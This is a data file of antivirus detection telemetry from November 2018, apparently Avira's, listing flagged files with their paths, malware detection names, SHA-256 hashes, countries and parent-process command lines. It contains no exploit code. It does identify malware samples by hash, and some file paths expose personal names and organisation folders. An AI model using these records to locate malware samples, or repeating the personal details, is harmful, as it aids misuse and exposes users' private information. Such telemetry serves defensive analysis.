  Row(detection=Row(filename='dwtrig20.exe', filepath='D:\\BKP HD\\Lixo 2\\Desktop 2015\\BKP Servidor\\CPD\\DOWNLOADS\\Office 2007\\OFFICE.PT-BR\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:06:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152137-84e12afa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152137-84E12AFA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151613-46ea7052', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151613-46EA7052', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T13:51:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='626.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\SICUREZZA NEI LUOGHI DI LAVORO\\626.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX OCT. 2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='a4bd6b6eb6b1a6ddcc5083e1de8044516a2e77440b9bf41075e6076314ad5688', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='addmcat.exe', filepath='D:\\pc drivers\\DP_Sound_Creative_13101 pult out\\Gigabyte\\AllNT\\GB2\\Driver\\AMD64\\Addmcat.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='aab87df0ced24043d18bcb9d931a72be9ce8b0fa7cd88dde6da8ae69aa05c386', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:30:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e78e8a3e8a892d4b51974fc8defbd76cf7a08883cfdc7bc2221c7a25a4a0a958', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E78E8A3E8A892D4B51974FC8DEFBD76CF7A08883CFDC7BC2221C7A25A4A0A958', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e78e8a3e8a892d4b51974fc8defbd76cf7a08883cfdc7bc2221c7a25a4a0a958', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:19:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qnkqnyas.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\qNkqnyas.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094820-2b579916', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094820-2B579916', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:48:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agricolo.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede ultime APRILE 2016\\agricolo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bc88ede548e518b9ec21a4c08c9e22585854d33140901afadd69a5584a4be9d4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BC88EDE548E518B9EC21A4C08C9E22585854D33140901AFADD69A5584A4BE9D4', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='bc88ede548e518b9ec21a4c08c9e22585854d33140901afadd69a5584a4be9d4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='e3c17d9e506df01540ca7d1c94e38f28d4af7f8d809ca663e43c69914da040bf', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bvfznilw4xq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='GY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=5073376, timestamp='2018-11-01T15:15:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093840-bc3a9edf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093840-BC3A9EDF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='convenzioni quadro 2017-2019.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\CONVENZIONI QUADRO 2017-2019.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agricoli.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\AGRICOLI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5049599\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Baixaki_Panda Antivirus Pro_2077000250.exe', parentsize=2299080, timestamp='2018-11-04T02:59:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:41:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000aab41', filepath='C:\\Windows\\Temp\\342e7ceb-d93d-4c8c-a51a-9c27e99af2f0\\tmp0000015c\\tmp000aab41', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T13:37:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3636975\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/ads:1 \\\\\\/host:ZRR0d187WxY7Ujd3SCFSFixIJmRDOwgHLFYnd1hpUgU0VDpxQCQAXm9TdylBPhJNJUxgIEwoCEE1QWZvVi4LQGJdaSYBLQ4JaEN9fQkvERh7cGFqFC8VBXtDZlpKczlreiwJRR9UbH8wew0bWRdsaCpyDQxpN20 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\installer_pro_tools_10_10_0_1014586325.exe', parentsize=2419494, timestamp='2018-11-04T20:17:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161609-ca3db989', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161609-CA3DB989', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:16:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131141-19432666', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131141-19432666', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eulczjh.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\eulczjh.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:13:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7488727\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$2C071A,19407005,139776,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\atube-catcher-3-8-9510.exe\\\\\\" \\\\\\/SPAWNWND=$909E4 \\\\\\/NOTIFYWND=$C0E4C ', country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-IK7PA.tmp\\atube-catcher-3-8-9510.tmp', parentsize=1191936, timestamp='2018-11-04T22:50:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='convertad.exe', filepath='C:\\Users\\X\\AppData\\Local\\ConvertAd\\ConvertAd.exe', filesize=1792000, name='HEUR/AGEN.1004878.#M1.#R1'), hash='90ed09f63df7284a395ae4f3b7ac44216901c0e9ad8bb7a6c0c1c3ed5d209187', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4673304, timestamp='2018-11-04T15:42:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162009-e1f11ec5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162009-E1F11EC5', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:20:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T18:49:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='50c1ae6d2e294.ocx', filepath='C:\\ProgramData\\SaveAs\\50c1ae6d2e294.ocx', filesize=128000, name='ADWARE/Adware.Gen.#M2.#R4876'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ganja skin_mc.exe', filepath='E:\\Users\\X\\festplatte\\Alex\\Downloads\\Ganja Skin_mc.exe', filesize=1408000, name='TR/Orsam.A.9368.#M1.#R1'), hash='324518c10ae1dfff7ac0cf6dbc606493c1f7e0bb7072402c2fb2afd126d817f2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T04:23:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182556.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp102\\A0182556.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='98ac709299f725a47b3ddd1f535af413d6a4a6b704c38170c25193d7ecab84f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T03:12:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='individual assignment 5 _ nthnhung.exe', filepath='G:\\\xa0\\VET\\Individual Assignment 5 _ NTHNhung.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='473d7f1ee4cd4dd4e0b2b195d9fc2f5c6389ce6787db8c2118e8ac45285deb97', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T09:18:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-030608-a7f09c9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9870b44\\AVSCAN-20181105-030413-9E866C6E\\AVSCAN-20181105-030608-A7F09C9F', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:36:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131125-18023a75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131125-18023A75', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130621-0108c54a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130621-0108C54A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:06:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=257024, timestamp='2018-11-04T12:51:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7842601\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:35:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135046-9ddaadd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd0e46c1\\AVSCAN-20181104-134938-95327B7F\\AVSCAN-20181104-135046-9DDAADD4', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='36706adf4832b5785a472241af4bad550aa715084826a596ca8462755f0cd3a2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:50:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-064238-fb22b7fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa9e90a7\\AVSCAN-20181105-064219-F6FB9EDC\\AVSCAN-20181105-064238-FB22B7FE', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:42:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ccminer.exe', filepath='E:\\避難先\\ccminer-djm34-mod-r1 予備\\ccminer.exe', filesize=61632000, name='HEUR/AGEN.1031883.#M1.#R1'), hash='9d283ec8daef71b6046fdaa78a46501be335d3612b6583f5b8d454529be780c2', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T10:31:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141731-35da6095', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-141731-35DA6095', filesize=128000, name='ADWARE/AgentCV.A.10412.#M1.#R1'), hash='26e1d911bfcd1044d2c49eb854e8688241350e76f3e23b66022c32d8b09b5f9d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:17:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204818-d88ce3f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204818-D88CE3F7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:48:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='graph.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T12:38:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5061947.exe', filepath='C:\\Program Files (x86)\\Super\\5061947.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:48Z'), dt=datetime.date(2018, 11, 4)),
